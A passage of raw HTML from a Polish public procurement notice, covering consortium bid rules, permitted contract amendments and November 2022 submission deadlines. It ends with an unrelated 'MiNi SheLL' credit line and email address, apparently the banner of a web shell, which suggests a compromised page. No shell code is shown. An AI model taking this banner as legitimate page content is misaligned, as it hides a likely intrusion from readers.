wykonawcy, wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia publicznego, podmiotu udostępniającego zasoby na zasadnych określonych w<br/>art. 118 ustawy lub podwykonawcy niebędącego podmiotem udostępniającym zasoby <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wymaga się, wymaga się, aby przynajmniej jeden spełniał warunki określone w rozdziale 5 pkt. 2 tj. wszystkie ww. warunki muszą być spełnione, ale niekoniecznie przez każdego z Wykonawców. Ocena spełniania warunków udziału w postępowaniu dla Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia będzie dla nich dokonywana łącznie. Żaden z wykonawców nie może podlegać wykluczeniu.<br/>Informacja dla Wykonawców wspólnie ubiegających się o udzielenie zamówienia (spółka cywilna, konsorcjum):<br/>1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy zobowiązani są do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>Pełnomocnictwo należy dołączyć do oferty i powinno ono zawierać w szczególności wskazanie:<br/>1) postępowania o udzielenie zamówienie publicznego, którego dotyczy;<br/>2) wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia;<br/>3) ustanowionego pełnomocnika oraz zakresu jego umocowania.<br/>3. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenie o niepodleganiu wykluczeniu i spełnieniu warunków udziału w postępowaniu o którym mowa w Rozdziale 7 ust. 1 pkt. 1 tabeli SWZ, składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia i spełnienie warunków udziału w postępowaniu w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>4. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenie o niepodleganiu wykluczeniu dotyczące przesłanek wykluczenia z art. 7 ust. 1 Ustawy o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego, składa każdy z wykonawców wspólnie<br/>ubiegających się o zamówienie .<br/>5. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy.<br/>6. Przez wykonawców występujących wspólnie rozumie się konsorcjum czyli doraźne zgrupowanie wykonawców dla wykonania zamówienia, bądź spółkę cywilną. Wykonawcy występujący wspólnie winni:<br/>- ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, <br/>- złożyć wszelkie wymagane Specyfikacją dokumenty,<br/>- na stronie oferty zamieścić informację w jakiej formie występują w postępowaniu (konsorcjum czy też spółka cywilna) oraz podać nazwy wykonawców i ich adres.<br/>7. Jeżeli wykonawcy wspólnie składają ofertę w postępowaniu, to członkowie konsorcjum bądź poszczególni wspólnicy spółki nie mogą, jako samodzielny wykonawca złożyć drugiej oferty w tym postępowaniu, jak również nie mogą być uczestnikiem innego konsorcjum bądź wspólnikiem w innej spółce, także składającej ofertę <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zmiany postanowień niniejszej umowy wymagają dla swej ważności formy pisemnej w postaci aneksu pod rygorem<br/>nieważności, z zastrzeżeniem ust. 2.<br/>2. Istotna zmiana niniejszej umowy wymaga przeprowadzenia nowego postępowania o udzielenie zamówienia.<br/>Dopuszczalna jest zmiana niniejszej umowy bez przeprowadzenia nowego postępowania o udzielenie zamówienia w<br/>przypadkach określonych we wcześniejszych paragrafach umowy oraz poniżej:<br/>a) zmiany podwykonawcy, o którym mowa w § 7 ust. 1 pod warunkiem, że Wykonawca udowodni Zamawiającemu, że<br/>realizując niniejszą umowę będzie dysponował niezbędnymi zasobami nowego podmiotu, w szczególności przedstawi<br/>zobowiązanie tego podmiotu do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji niniejszej umowy<br/>oraz wykaże, że nowy podmiot spełnia warunki udziału w postepowaniu, o których mowa w art. 124 ustawy Prawo<br/>zamówień publicznych w stopniu nie mniejszym niż podwykonawca, z którego usług zrezygnowano,<br/>b) rezygnacji z podwykonawcy, o którym mowa w § 7 ust. 1, a Wykonawca udowodni Zamawiającemu przez przedstawienie<br/>odpowiednich dokumentów, że Wykonawca samodzielnie spełnienia warunki udziału w postępowaniu, o których mowa w<br/>art. 124 ust. 1 ustawy Prawo zamówień publicznych w stopniu nie mniejszym niż podwykonawca, z którego usług<br/>zrezygnowano,<br/>c) zmiany obowiązujących na terenie Rzeczypospolitej Polskiej przepisów dotyczących wysokości stawek podatku od<br/>towarów i usług (VAT) w zakresie obejmującym przedmiot niniejszej umowy, obie strony zobowiązują się do odpowiedniej<br/>zmiany umowy w tym zakresie, zgodnie z którą Zamawiający zapłaci cenę netto powiększoną o podatek VAT w zmienionej<br/>stawce, obowiązującej w dniu wystawienia faktury przez Wykonawcę, dla danego zakresu przedmiotu umowy, dla którego<br/>obowiązuje nowa stawka,<br/>d) zmiany albo wprowadzenia nowych przepisów lub norm, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści<br/>umowy do aktualnego stanu prawnego,<br/>e) w innych przypadkach wskazanych w art. 455 ustawy Prawo zamówień publicznych.<br/>f) w przypadku zmiany umowy o dofinasowanie projektu lub zmiany wytycznych dotyczących tego projektu w zakresie odpowiadającym lub wynikającym z tych zmian, <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-11-18 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://e-propublico.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-11-18 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-12-17</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com